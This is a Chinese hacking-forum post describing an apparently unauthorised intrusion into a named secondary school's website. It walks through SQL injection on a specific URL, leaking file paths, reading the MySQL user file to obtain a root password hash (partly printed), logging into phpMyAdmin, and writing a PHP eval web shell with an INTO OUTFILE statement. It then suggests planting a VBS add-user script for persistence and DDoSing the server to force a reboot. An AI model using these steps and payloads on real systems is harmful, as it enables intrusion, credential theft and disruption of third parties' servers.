中国网络渗透测试联盟

标题: 友情检测湖北省大治市第一中学 [打印本页]

作者: admin    时间: 2013-1-11 21:32
标题: 友情检测湖北省大治市第一中学
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏3 u* f! d& B$ ^! O
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
" z- V  o( L: B$ x. [/ `% v9 d! C$ W6 O$ q9 S" A! t- I: r% }
/ b- J: P1 \  a7 s
# l2 d# r, z; Q8 e) ]8 J/ v
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
6 j# O/ b8 g/ P) t7 n* Q
& |: C4 T  W" ~6 p, e8 i$ x2 I4 }# ]那么想可以直接写入shell ,getshell有几个条件:% ^( ]9 B+ i9 i. \9 ~9 }# l- d
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
' C' ?* s' S# _2 a( W6 |$ u# b- F
试着爆绝对路径:: y  a- u) w, O
1./phpMyAdmin/index.php?lang[]=1  ! `1 z/ ^4 @2 L4 d- l
2./phpMyAdmin/phpinfo.php  + n5 J0 _- F2 u+ u: o
3./load_file()  * N9 k9 r% e' D0 j+ L2 F8 H8 ~
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
2 o0 K' t4 g) d% k5./phpmyadmin/libraries/select_lang.lib.php  
) U( f! t9 ]  [  D  m* u" P9 Q6./phpmyadmin/libraries/lect_lang.lib.php  ! N* K1 ~* h6 S
7./phpmyadmin/libraries/mcrypt.lib.php   & L  c0 Z" b: m* p2 M# O
8./phpmyadmin/libraries/export/xls.php  
% W8 D' M  T1 n  T) ], V0 d7 \- y. I
( Q* K! S$ O8 Y4 v& V均不行...........................
3 t2 g, Q' o3 _" f9 e9 ^+ p
! M6 D2 e9 [2 J  C% B) t御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php/ b- B/ D, C3 R4 }  R! H7 F& [  z2 U; V5 n

2 Q' l9 i/ j! [7 [5 }权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
2 g+ S! o2 S7 w3 K/ z7 P# N8 ~; d2 r% p) r9 r$ k2 p: v
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败* e* f5 S7 s6 ~8 E+ E: ?4 g3 u

9 r3 Z0 S) b! Z+ k& P4 b2 B敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
$ A* ^% |! Q2 C$ b' v. P! p  c8 d& J
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
" a/ o. c# ^& F% Q4 z% Z$ ]. k/ w8 B' ]! S9 F- ]6 g- ?% ~+ i% l' x
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
1 c; e, Y# R/ k9 z! E3 y$ P* I2 ~/ {7 f; I
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 9 N7 H$ c- s3 ]/ _: ^2 V/ G
) H5 k. T4 O: h8 {9 o; F0 L4 T
成功读到root密码:: }# ]4 |. j4 Y* C) F0 c9 }1 ~( `
" B5 U, W& [* _$ D6 S( B7 _
17---- r(0072)  a3 e; _( ^+ f4 _& e
18---- o(006f)
9 L4 H. y- _$ e19---- o(006f)
+ \( K7 C+ w3 _) a20---- t(0074)" I/ ]' w) F+ _" m1 p( A3 u) }
21---- *(002a)1 N$ e! P! u0 E( E3 ?
22---- 8(0038)0 w* {  D. [! y5 b5 d6 w+ l$ x
23---- 2(0032)
- j' B! ^/ E0 K, \" H/ \; X; }/ F; B24---- E(0045)7 t. X$ f: [. y6 v1 A
25---- 1(0031)
) u6 d$ {* F: J3 ]26---- C(0043)8 B1 `: `4 p* B  U
27---- 5(0035)$ m' V% H# F% Q9 U. J8 ^
28---- 8(0038)
5 D4 i. i. s2 c1 s9 n29---- 2(0032)
7 L2 A+ Z! L2 k# M3 ?, A( A  C3 G5 f30---- 8(0038)
' C2 E4 r! M1 u; A/ A31---- A(0041)2 r! X7 p6 ^* u) a
32---- 9(0039)
" m8 _! Y8 ?( O33---- B(0042)
8 Z9 P: F) Y$ Y- u34---- 5(0035)
2 I% `- q1 D  a5 Q; {; i0 T35---- 4(0034). Y2 F: g3 B. Y& |
36---- 8(0038)% K( }6 j7 v9 l( f- }/ R0 w/ T
37---- 6(0036)
7 i5 Q% j1 R1 F( o+ Q$ [  I38---- 4(0034)( Y7 \: u+ F( V. u! R' e
39---- 9(0039)
/ H6 Q, ~+ C- T/ ^6 }# }40---- 1(0031)
8 W: S) _0 R- e& M0 ?7 p) @41---- 1(0031)
) ^9 o5 w0 R, G1 X+ l42---- 5(0035)6 o+ m& D- y# N2 V; c: _
43---- 3(0033)
$ B, N# R& i$ v, d& K8 X$ _44---- 5(0035)
5 \! S$ i& V/ Q: Z  ?; }5 j7 \45---- 9(0039)3 }" |+ m; S  K2 b2 O
46---- 8(0038)$ l; z  u! ]. i# A: ^, c2 N: ^6 J
47---- F(0046)
9 w2 ~; Z# B! o48---- F(0046)$ E8 @7 s0 A/ c& w
49---- 4(0034)
9 E6 q* `- |' q8 r! l8 L50---- F(0046)
: `$ p: d1 v$ d51---- 0(0030)$ B6 h; z+ O4 x0 L
52---- 3(0033)7 u6 y4 g0 G6 p1 |% J
53---- 2(0032)% T; A7 D2 A* W/ j5 |9 G
54---- A(0041)
- O/ ]& D, D3 Z. k: w55---- 4(0034)
3 k" P" @7 R; ?56---- A(0041)8 [/ ]1 M4 E* x3 U! [. P
57---- B(0042): U/ M0 C3 M- I% k9 G  v, L) g8 \
58---- *(0044)
; H( e6 n9 p- ^# d, }59---- *(0035): E0 Q0 X) s+ o/ f2 [0 o, r2 `- p8 J
60---- *(0041): s! ^( _2 J1 |) Z, ]' i
61---- *0032)
, Y+ m+ G  A' d/ X& I. c5 ~, b2 Q" ]: @% _
解密后成功登陆phpmyamin
8 b0 u8 D+ D8 [                          
( l$ [% k4 q5 t5 c# L7 Z
, C! m' g( w1 u( h4 \3 |                             [attach]164[/attach]" h3 a- |4 A# _( S9 Q" b1 S  h
1 m' K1 K6 ]: F0 G
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'! E) Z4 q/ L3 h" L1 `4 M8 m
4 W2 |0 f4 C* f% z( {4 q1 E( J
成功执行,拿下shell,菜刀连接:: `9 t5 L$ j+ o) K* Y8 [
5 F# M7 S  ]# z* d
服务器不支持asp,aspx,php提权无果...................
! O& l& U  k' n3 K& |& _# X
0 d" C$ H1 f- L/ o但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
* ]" k* X" H7 s. x* G+ S% M
服务器上已经有个隐藏帐号了

/ A* K' Q9 d9 ?* c) j+ L; h8 \, c
别名     administrators
7 ^3 f! j6 W: e$ ~注释     管理员对计算机/域有不受限制的完全访问权

3 k1 `1 A4 B- ]' t' B7 B. G1 |
成员

4 O8 R: l9 ~* H" _1 v5 g0 D
-------------------------------------------------------------------------------
+ N& U: o0 R* c7 Xadmin# Y, P: [7 P0 P% g% O
Administrator+ U2 B, ~0 }+ P6 g% v
slipper$
* Q" q7 \6 X. s: Dsqluser% [. s4 }1 _2 N3 w
命令成功完成。
* T$ ?( S4 G; |8 a% Z' k) K% s4 w  p  k
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
0 g3 `; i% K4 c  I9 \6 l, z) Z, p
7 S. ?3 u* f+ E& r. r" S$ V  Nddos服务器重启,不然就只能坐等服务器重启了...............................
% k. i! ?/ L5 ^2 t0 |# a; t
7 x4 H* M) a' C$ ]9 U- |) g2 _      
" r* I* @* T0 X+ C# l# ^

作者: angel    时间: 2013-5-20 15:28





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2